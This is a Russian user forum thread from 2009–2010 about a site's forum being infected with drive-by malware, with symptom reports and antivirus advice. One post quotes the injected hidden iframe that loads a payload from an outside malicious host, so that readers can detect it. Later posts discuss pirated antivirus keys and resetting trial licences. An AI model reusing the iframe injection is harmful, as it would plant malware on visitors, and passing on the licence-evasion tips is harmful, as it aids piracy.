Вирус!

Evgeniy R 27.11.2009 - 12:53

На сайте Эдган точнее на форуме есть вирусяга!!! Так что у кого нет файрвола можите прилипнуть.

никитос 27.11.2009 - 13:29

Только что оттуда. Аваст молчит.

Gin.ru 27.11.2009 - 14:02

Есть такое дело. Висит скрытый фрейм. Браузер ломится на script-meta09.com и качает оттуда пакость. Фу-ууу админам эганского форума...

Gin.ru 27.11.2009 - 14:04

никитос
Аваст молчит.

У меня KIS орёт, что идёт обращение к -http://script-meta09.com/index/aHere.class, который содержит Trojan-Downloader.Java.Agent.ab

Эдуард 27.11.2009 - 15:38

Все пофиксено еще вчера было.

Gin.ru 27.11.2009 - 17:59

Значит после этого опять инфицировали форум

Fake 27.11.2009 - 19:48

Вот, похоже, из-за этого я вчера и занимался форматированием всех своих винтов на компе. Подцепил такую срань, что ни в сказке сказать, ни пером описать. Пля.

mavic 28.11.2009 - 12:50

Почистили уже? а то у меня лицензия на антивирь кончилась.

Gin.ru 28.11.2009 - 01:55

mavic
Почистили уже?

нет. Легко убедиться 😀
Откройте исходный текст центральной страницы форума (в IE меню "Вид"-> Просмотр HTML-кода). Если на предпоследней строке увидите что-то типа

«iframe rsqdf='QmW7cFUR' src='http://mobi-sripts.com/s/in.cgi?6 ' ulmnu='JjfHev5B' width='0' height='0' style='display:none'»«/iframe»

значит пакость там. На момент, когда пишу эти строки - так и есть :<

Эйнштейн 28.11.2009 - 16:07

Протестил без фаервола, аваст поругался на один троян и один адэвэйр, но пропустил ещё два трояна.. Эти падлы заблокировали инет (через фаервол, кстати) и модифицировали некоторые драйвера от явы и звука. Лечится КьюрИтом из под АВЗгварда нормально, Но потом этим же авз надо проверить все библиотеки и дрова на подозрительные.

Fake 28.11.2009 - 18:02

Я словил какую-то гадость, которая вывесила поверх всех окон порнуху, которую назвала рекламной заставкой и предложила отправить СМС на номер 3649.
Заблокировала прописанный антивирус (Avira Anrivir), прописанную Оперу (ИЕ работал), квип.
Так же, заблокировала доступ к Диспетчеру файлов (ни три кнопки, ни вызов через коммандную строку не работали). Запущенные с флешки проги для просмотра запущенных процессов отрубались на лету (закрывались после открытия), запущенный с флешки антивирус успел только частично проверить комп, потом перезагрузка. Безопасный режим просто не грузится. Попытался прогрузится с сидюка с ДрВебом под линухом, не получилось. Толи руки кривы, толи еще что. Погоревал, погоревал и форматнул оба харда нахрен.
Раньше подобную хрень видел как надстройку к браузеру, а тут она самостоятельная стала. Работает независимо от всего.
Уррроды...

Эйнштейн 28.11.2009 - 23:38

Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..

Fake 29.11.2009 - 12:00

Эйнштейн
Fake, уж не cmedia ли ты поймал? или fieryads.. У меня недавно такое было, обошелся меньшей кровью, в компьютерной ветке писал. Без avz все антивирусы бесполезны..

Вот как раз AVZ оно и отлупляло но половине работы.

Эйнштейн 29.11.2009 - 12:13

Если включать AVZguard, то ничего вирус возразить уже не сможет

Fake 29.11.2009 - 12:24

Эйнштейн
Если включать AVZguard, то ничего вирус возразить уже не сможет

А как его подключить? У меня эта закладка не активна. Скачал другую версию AVZ, та же история.

PS Вопрос отпал. Под ХР все работает.

Эйнштейн 29.11.2009 - 12:35

хз, версия 4.32, всё активно. Потом нужно выбрать второй пункт этого меню и оттуда запустить cureit

Fake 29.11.2009 - 12:41

Я его воткнул на старый ноут с МЕ. Под МЕ эти две закладки не активны.

Эйнштейн 29.11.2009 - 12:52

ну дык 😊 хр и милениум слишком разные просто, там другая версия проги требуется

unnamed13 29.11.2009 - 11:32

А на какие браузеры эта дрянь садиццо? Я вчера заходил с w7 через ff3.5.5 - не заметил ничего необычного. Из плагинов у меня только adblock+. За ie8 + smartscreen не скажу, но вроде чисто.

За линукс с ff/opera/chrome я спокоен, винда на еее живет второй ос. Отпишитесь кто чем поймал.

Fake 29.11.2009 - 13:41

У меня она сидела не на браузере. Включил комп, кликнул на антивирус и тут тебе окно на 2/3 экрана с порнухой и предлжением отправить СМС.

ЗЫ Винда ХР, Опера 10, Avira Antivir

miksa 29.11.2009 - 15:30

Вот тады мне объясните юзеру: ХР, Касперский, захожу на форум часто, очень часто. За прошедшие дни Каспер ни разу не руганулся! Окон, со всякой хренью не всплывало, тока комп стал слегка подтормаживать одно время, но в данный момент вроде всё нормально.
Полные проверки через Касперского делал - попросил удалить Куип (асю). Вирусняк, что выборочно приходит или он есть, тока я его не ощущаю? 😞

unnamed13 29.11.2009 - 19:52

Видимо эта херь лезет если обновления не ставишь - типа дыры в системе.
У меня всё патченое-перепатченое - форточке лицензионно расово чистые.

Эйнштейн 29.11.2009 - 23:30

У меня всё рассово русское 😀, скажите, форум уже переустановили? Ачкую заходить..

unnamed13 30.11.2009 - 11:24

29 обещались переустановить.

Gin.ru 30.11.2009 - 13:09

Эйнштейн
форум уже переустановили? Ачкую заходить..

не боись. Усё починили уже 😊

Neznajka 03.12.2009 - 18:25

да, у меня тоже оттуда залез этот вирус.
вылезла хня какая то с просьбой прислать смс.
еле вычистил НОД32 с перезагрузкой и установкой даты на год назад.
теперь намано всё, но иногда броузер срубаеться.

в диспетчере висел как винагент вроде.

Эйнштейн 04.12.2009 - 18:29

Какбэ.. они снова лезут. win32.hllw.shadow.based & trojan.packed.16593

dizel-xp 05.12.2009 - 12:45

Касперский ничего не выявлял, ни чего не вылазит. Люблю Каспера 😊

Drivovich 09.12.2009 - 15:23

Вообще неплохо иногда проверять свой комп целиком какой ньть прогой типа CureIt! от Dr. Web или Virus removal tool От каспера. Желательно делать это в "SAFE MODE", а ещё лучше грузя систему с диска типа BARTPE или аналогичного LIVE CD. И не забываем обновлять систему - дыр в Винде ещё полным полно, если винда "серая", то качать обвновления можно отсюда - http://forum.oszone.net/thread-145420.html Удачи !

Exp10iT 11.12.2009 - 09:59

dizel-xp
Касперский ничего не выявлял, ни чего не вылазит. Люблю Каспера 😊

-Видишь Суслика?
-Нет.
-И я нет, а он есть. 😛

DiXXX 01.01.2010 - 02:50

никитос
Только что оттуда. Аваст молчит.

У меня стоял аваст. А потом была бессонная ночь... Теперь стоит Кашпирофский ИС 2010, и много чего интересного повылезало 😀 https://guns.allzip.org/topic/169/567474.html Только STALKER стал подтормаживать, если антивирус не отключить.

КЕЙДЖ 01.01.2010 - 20:52

DiXXX
Только STALKER стал подтормаживать, если антивирус не отключить.

если не через инет играешь то можешь антивирус отключить в сталкера рубанутся, потом опять каспера врубил и полез покорять просторы интернета :-) (а так без него в инет ни ни )

DiXXX 01.01.2010 - 21:11

КЕЙДЖ
то можешь антивирус отключить в сталкера рубанутся,

Я так и делаю 😊 Кашпировский- весчь! 1600 только на год жаба душит, а ключ хрен найдешь... Беда-а. 😊

DiXXX 01.01.2010 - 21:34

Я тут поизучал немного, если правильно понял каспер продается для установки на два компа. Этот гад собирает сведения о системе и передает при установке Кашпировскому лично 😀. При попытке регистрации третьего компа юзер идет лесом. Это началось в КИС 2010 😞

Шмулевич 04.01.2010 - 19:57

Кажый день тот форум посещаю и ничего описанного не обнаружил.

Olegych33 05.01.2010 - 18:26

КЕЙДЖ

DiXXX

Ребята, на лицензии каспера можно съэкономить, купив ОБНОВЛЕНИЕ КИС2010 за 960 руб. У меня все без проблем работает 😊

КЕЙДЖ 05.01.2010 - 18:45

но уворовать то спортивнее 😀

DiXXX 05.01.2010 - 21:45

КЕЙДЖ
но уворовать то спортивнее

+1. Но, похоже, придется покупать...

Olegych33
Ребята, на лицензии каспера можно съэкономить, купив ОБНОВЛЕНИЕ КИС2010 за 960 руб.

Была такая мысль, но на месте Кашпировского я бы такого постарался не допустить. Может обновлялась не пробная тридцатидневная версия, а предыдущая лицензионная?

КЕЙДЖ 05.01.2010 - 22:06

а чего пробная версия не обновляется ? если обновляется то можно до бесконечности ставить и удалять, просто постоянно будет напоминать дай деньгу дай 😀

DiXXX 05.01.2010 - 23:11

КЕЙДЖ
а чего пробная версия не обновляется ?

Она работает только 30 дней, при этом естественно обновляется и т.д.. Второй раз ее на этот комп не поставить. Сейчас душу жену на 1600р. 😊

Olegych33 06.01.2010 - 12:42

DiXXX

Поставил, и при установке указал, что есть ключ. Вообще про обновление сказано только на коробке, внутри обычный диск с дистрибутивом и серийником. И этот вариант мне подсказал знакомый продавец Касперского, ну а я, соответственно, воспользовался и делюсь с остальными. Так что все будет пучком 😊 Не трать лишние бабки 😊

DiXXX 06.01.2010 - 01:06

Olegych33
Так что все будет пучком Не трать лишние бабки

Спасибо за наводку 😊. У меня еще есть 26 дней, буду думать.

КЕЙДЖ 06.01.2010 - 14:14

DiXXX
Второй раз ее на этот комп не поставить

это почему ещё ? просто она создаёт запись в реестре почистить реестр , найти всё что связано с касперским удалить и вуаля 😊
примерно так
https://guns.allzip.org/topic/84/409966.html
хотя сейчас проги деинстоляторы далеко продвинулись и удаляют всё вместе с ключами( хотя на 10 не пробовал может и не удалит ) , если надо прогу деинстолятор то давай мыло пришлю , деинстолятором виндусовским не пользуюсь уже давно .
P.s чёто уверености у меня поубавилось через 29 дней посмотрим 😀 , а в прогах которые сбрасывают триал и как бы позволяют ставить его снова и снова сидит троян 😞

КЕЙДЖ 08.01.2010 - 15:31

отписал в личку 😀

Gribnik78 11.01.2010 - 16:20

DiXXX
Я так и делаю 😊 Кашпировский- весчь! 1600 только на год жаба душит, а ключ хрен найдешь... Беда-а. 😊

"Вам презервативы качественные или китайские?...(R) 😛

Тоже много лет жаба душила, но когда за полгода 3 раза переустанавливал из-за вирусни и потерял очень много нужной по работе и просто полезной информации- пристрелилнах эту самую сволочную жабу и купил лЫцензию "КИСу Кошмаровского 2009"(R) и в настройках сразу поставил на автоматическое обновление при каждом подключении... вот уже почти год- ни каких проблем. Скоро С УДОВОЛЬСТВИЕМ заплачу за продление ключа 😛 Это ж копейки по сравнению с ...(каждый думает о своих проблемах). Я на бензин, на покатушки, шашлыки и прочее развлечение- по 1,5-2 тысячи Русских карбованцев в месяц трачу. а тут купил раз и целый год кайфа 😀

Кстати, как бывший пользователь пиратского каспера с непойми какими ключами на месяц а потом в чёрный список; и как нынешний пользователь ЛИЦЕНЗИИ- авторитетно заявляю: пиратка них..... нифига не видит и тормозит машинку сильнее раза в 1,5-2, нежели лицензия! 😛

Зы: сегодня заходил на ЭДганогвский сайт: каспер хрюкнул разок, что, дескать-пресёк попытку прорыва хрен пойми чего на мой комп и больше не квакал 😛 внимания, по привычке не обратил. сейчас по времени посещения и времени фиксации в отчёте каспера сопоставил.

вот чего он там на квакал: Intrusion.Win.MSSQL.worm.Helkern

также этим же вирусом за сегодня зафиксированы ещё 3 попытки проникновения, причём одна с ГАНЗы и два- с левых сайтов к пневме не относящихся. По ходу дела- массовая атака.
далее каспер по умолчанию пресекает.

Так же с ЭДгановского сайта зафиксированы 2 баннера.

КЕЙДЖ 11.01.2010 - 19:00

ну если само тело программы скачено с сервера касперского ( не выложено на стороннем ресурсе а следовательно не прошло обработку умными дядями ) и ключ подходит то есть не забанен, он ни чем от лицухи не отличается, это та же самая лицензия , тут либо смирится что рано или поздно придётся менять ключ или покупать лицуху но разницы не будет ,при условии ещё раз повторюсь что дистрибутив проги скачен на оф сайте , а базы касперского надо поставить если лицуха на автоматическое обновление то есть раз в 3 часа , так как вирусы пишут быстрей чем успевают писать лекарство с ним . так что раз в день это мало :-)